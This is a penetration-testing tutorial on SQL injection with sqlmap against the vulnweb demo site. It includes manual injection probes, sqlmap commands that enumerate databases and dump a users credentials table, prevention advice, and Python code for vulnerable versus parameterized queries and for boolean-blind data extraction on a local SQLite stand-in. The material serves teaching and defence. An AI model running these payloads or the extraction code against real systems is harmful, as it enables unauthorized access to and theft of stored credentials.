Database Penetration Testing using Sqlmap #1

Database Penetration Testing using Sqlmap in Kali Linux

SQLMap Overview

SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities. It enables the takeover of database servers with a powerful detection engine and numerous features tailored for advanced penetration testers. Its capabilities range from database fingerprinting and data extraction to accessing the file system and executing operating system commands via out-of-band connections.

Features

  • Database Management Systems: Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB, and Informix.
  • SQL Injection Techniques: Supports six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries, and out-of-band.
  • Direct Database Connection: Ability to connect directly to the database without SQL injection by providing DBMS credentials, IP address, port, and database name.
  • Enumeration: Supports enumerating users, password hashes, privileges, roles, databases, tables, and columns.
  • Password Cracking: Automatically recognizes password hash formats and supports cracking them using dictionary-based attacks.
  • Data Dumping: Supports dumping entire database tables, a range of entries, or specific columns. Users can also choose to dump only a range of characters from each column’s entry.
  • Database Search: Supports searching for specific database names, tables across all databases, or specific columns across all databases’ tables. Useful for identifying tables containing application credentials.
  • File Transfer: Supports downloading and uploading files from the database server’s file system when using MySQL, PostgreSQL, or Microsoft SQL Server.
  • Command Execution: Supports executing arbitrary commands and retrieving their standard output on the database server’s operating system when using MySQL, PostgreSQL, or Microsoft SQL Server.
  • Out-of-Band Connections: Supports establishing an out-of-band stateful TCP connection between the attacker's machine and the database server’s operating system, allowing for an interactive command prompt, a Meterpreter session, or a graphical user interface (VNC) session.
  • Privilege Escalation: Supports escalating the database process’s user privileges via Metasploit’s Meterpreter getsystem command.

SQLMap provides a comprehensive set of features for penetration testers, making it a versatile tool for assessing and exploiting SQL injection vulnerabilities.

When browsing a site that lets you pick items from a picture gallery, you will often notice that each item is referenced by a numeric ID in the URL. For example:

http://testphp.vulnweb.com/artists.php?artist=1

In such cases an attacker checks whether that parameter is injectable before launching a SQL injection attack. SQL injection is a technique in which the attacker alters the SQL query the application builds by supplying crafted input through form fields or URL parameters. This can lead to unauthorized access to the database, allowing the attacker to read, modify, or delete data.

Here's a brief outline of how an attacker might proceed:

  1. Identify Vulnerable Input: The attacker identifies form fields or URL parameters that reach a database query, such as the artist parameter above.
  2. Test for Vulnerability: The attacker appends a single quote to see whether the input is inserted into the query unmodified. For example: http://testphp.vulnweb.com/artists.php?artist=1' If the page returns a database error or different content from artist=1, the quote has broken the query syntax and the parameter is a candidate for injection.
  3. Exploit the Vulnerability: Once confirmed, the attacker crafts SQL that changes the query's logic. For instance: http://testphp.vulnweb.com/artists.php?artist=1 OR 1=1-- The condition is now always true, so the query returns every artist instead of one, and the trailing -- comments out whatever the application appends after the parameter (in MySQL the -- marker must be followed by a space, which in a URL is encoded as %20 or +).
  4. Automate the Attack: Tools like SQLMap automate the detection and exploitation of SQL injection, including the blind techniques where the page shows no error and the attacker has to infer data from true/false differences in the response.

Preventing SQL Injection Attacks

To protect against SQL injection attacks, web developers should adopt the following best practices:

  • Use Prepared Statements and Parameterized Queries: Send the query text and the user-supplied values to the database separately, so the values are bound as data and can never change the structure of the statement. This is the primary defence.
  • Validate and Sanitize Input: Check every input against what the application expects (the artist parameter above should be accepted only if it is an integer) and reject anything else. Validation narrows the attack surface but does not replace parameterized queries; hand-written escaping of strings is error-prone and should not be relied on.
  • Use ORM Frameworks: Object-Relational Mapping frameworks issue parameterized queries by default; keep that default and treat raw-query or string-formatted query APIs as the exception that needs review.
  • Regular Security Audits: Regularly perform code review and penetration testing, including automated scans with tools such as SQLMap, to identify and fix vulnerabilities.
  • Update and Patch Systems: Keep your database and web server software up to date with the latest security patches.

By implementing these measures, you can significantly reduce the risk of SQL injection attacks on your web applications.
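The following is an added example, not code from the original post or from the SQLMap project, that runs steps 2 and 3 above against a local SQLite stand-in for artists.php and then against a parameterized version of the same page. The table name, columns and rows are constructed for the example and are not the real acuart schema; the handler names are assumptions.

```python
import sqlite3

# Constructed stand-in for the demo site's 'artists' table; the column names and
# rows are assumptions for this example, not the real acuart schema.
def make_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE artists (artist_id INTEGER PRIMARY KEY, aname TEXT)")
    conn.executemany("INSERT INTO artists VALUES (?, ?)",
                     [(1, "artist one"), (2, "artist two"), (3, "artist three")])
    return conn

def artist_page_vulnerable(conn, artist_param):
    """Builds the query by string concatenation, the pattern that makes
    artists.php?artist=<value> injectable."""
    sql = "SELECT artist_id, aname FROM artists WHERE artist_id=" + artist_param
    return conn.execute(sql).fetchall()

def artist_page_fixed(conn, artist_param):
    """Same query with a bound parameter: the value travels as data and can
    never change the structure of the statement."""
    sql = "SELECT artist_id, aname FROM artists WHERE artist_id=?"
    return conn.execute(sql, (artist_param,)).fetchall()

def probe(conn, handler):
    """Steps 2 and 3 from the list above: a lone quote to break the syntax and a
    tautology to widen the result set. Returns what an attacker would compare
    against the normal page."""
    baseline = handler(conn, "1")
    try:
        handler(conn, "1'")
        quote_breaks_query = False
    except sqlite3.OperationalError:      # e.g. 'unrecognized token' from the dangling quote
        quote_breaks_query = True
    try:
        tautology = handler(conn, "1 OR 1=1--")
    except sqlite3.OperationalError:
        tautology = []
    return {
        "baseline_rows": len(baseline),
        "quote_breaks_query": quote_breaks_query,
        "tautology_rows": len(tautology),
    }

def looks_injectable(conn, handler):
    obs = probe(conn, handler)
    # Either symptom means the input reached the SQL text unmodified.
    return obs["quote_breaks_query"] or obs["tautology_rows"] > obs["baseline_rows"]

if __name__ == "__main__":
    db = make_demo_db()
    print("vulnerable:", probe(db, artist_page_vulnerable), looks_injectable(db, artist_page_vulnerable))
    print("fixed:     ", probe(db, artist_page_fixed), looks_injectable(db, artist_page_fixed))
```

Against the vulnerable handler the quote raises a syntax error and the tautology returns all three rows; against the fixed handler both payloads are bound as text, match nothing, and the probe sees no difference from a harmless request. Adding an integer check on the parameter on top of the binding would reject both payloads before the query is even built.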

Database

For database penetration testing we use SQLMap. Open a terminal in Kali Linux and run the following command; sqlmap tests the artist parameter for injection and, once it finds a working technique, enumerates the database names:

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch

-u: target URL, with the injectable parameter in the query string

--dbs: enumerate DBMS databases

--batch: never ask for user input, use the default behaviour
As the screenshot shows, sqlmap has retrieved the application's database name, "acuart".


Tables

A database is a set of records organised into tables, so the next command fetches the names of all tables inside the database we just found.


sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch

-D: DBMS database to enumerate (the database name fetched above)

--tables: enumerate DBMS database tables
As the screenshot shows, every table in the database has been enumerated. There are 8 tables inside "acuart":

T1: artists
T2: carts
T3: categ
T4: featured
T5: guestbook
T6: pictures
T7: products
T8: users
Columns

Next we enumerate the column names of a chosen table. We know a users table exists inside acuart and we want all of its column names, so we run a third command for column enumeration:

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch

-T: DBMS table to enumerate (a table name fetched above)

--columns: enumerate DBMS database table columns
Get data from a table

Step by step we have mapped the structure of the database; the last and most important step is to retrieve the data stored in the columns of a table. Finally, then, we run a command that dumps the contents of the users table:

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch

--dump: dump DBMS database table entries (add -C with a column list to dump only specific columns)
As the screenshot shows, the whole users table has been dumped. This table holds the application's login credentials, so an attacker could use them to log in as any of those users. sqlmap also writes each dumped table to a CSV file under its output directory (by default ~/.local/share/sqlmap/output/<host>/dump/<database>/), and when a column contains password hashes rather than clear text it offers to crack them with a dictionary attack (the Password Cracking feature listed above); --batch accepts the default answer to that prompt.
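To show what sqlmap is doing behind --tables and --dump when only the boolean-based blind technique from the Features list is available, here is an added example that is not from the original post or from the SQLMap project. It replays the same injection against a local SQLite stand-in for artists.php and recovers table names and a credentials column one character at a time, with a binary search over each character's code. The table names, columns and rows are constructed, and SQLite's sqlite_master catalog stands in for MySQL's information_schema; the function and class names are assumptions.

```python
import sqlite3

# Constructed SQLite stand-in for the target: the 'artists' table behind
# artists.php and a 'users' table with credentials. Names, columns and rows are
# assumptions for this example, not the real acuart data.
def make_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE artists (artist_id INTEGER PRIMARY KEY, aname TEXT)")
    conn.execute("CREATE TABLE users (uname TEXT, passwd TEXT)")
    conn.executemany("INSERT INTO artists VALUES (?, ?)", [(1, "artist one"), (2, "artist two")])
    conn.executemany("INSERT INTO users VALUES (?, ?)", [("admin", "s3cret"), ("test", "test")])
    return conn

def artist_page_vulnerable(conn, artist_param):
    # Same injectable concatenation as artists.php?artist=<value>.
    sql = "SELECT aname FROM artists WHERE artist_id=" + artist_param
    return conn.execute(sql).fetchall()

class BlindOracle:
    """Turns the page into a yes/no oracle: the injected condition is ANDed to the
    legitimate WHERE clause, so the artist row appears only when it is true."""
    def __init__(self, conn):
        self.conn = conn
        self.requests = 0          # cost counter; each call would be one HTTP request for real

    def __call__(self, condition):
        self.requests += 1
        rows = artist_page_vulnerable(self.conn, f"1 AND ({condition})")
        return len(rows) > 0

def blind_extract(oracle, expr, max_len=64):
    """Recovers the text value of a scalar SQL expression one character at a time.
    Each character is found by a 7-step binary search over its ASCII code."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"length({expr})>={pos}"):   # NULL or too short: we are done
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({expr},{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out

def enumerate_tables(oracle):
    """What --tables does, reading SQLite's catalog instead of MySQL's
    information_schema.tables."""
    names = []
    while True:
        expr = ("(SELECT name FROM sqlite_master WHERE type='table' "
                f"ORDER BY name LIMIT 1 OFFSET {len(names)})")
        name = blind_extract(oracle, expr)
        if not name:
            return names
        names.append(name)

def dump_column(oracle, table, column):
    """What --dump does for one column: pull every row, in rowid order."""
    values = []
    while True:
        expr = f"(SELECT {column} FROM {table} ORDER BY rowid LIMIT 1 OFFSET {len(values)})"
        value = blind_extract(oracle, expr)
        if not value:
            return values
        values.append(value)

if __name__ == "__main__":
    oracle = BlindOracle(make_demo_db())
    tables = enumerate_tables(oracle)
    print("tables:", tables, "after", oracle.requests, "requests")
    creds = list(zip(dump_column(oracle, "users", "uname"),
                     dump_column(oracle, "users", "passwd")))
    print("users:", creds, "after", oracle.requests, "requests")
```

Every character costs eight oracle calls (one length check plus seven comparisons), which is why a blind dump of a large table takes thousands of requests and why sqlmap prefers UNION or error-based techniques when the page allows them and offers --threads for the blind ones. The loops stop at the first empty value, so a row whose column is an empty string would end the dump early; a real tool tracks the row count separately.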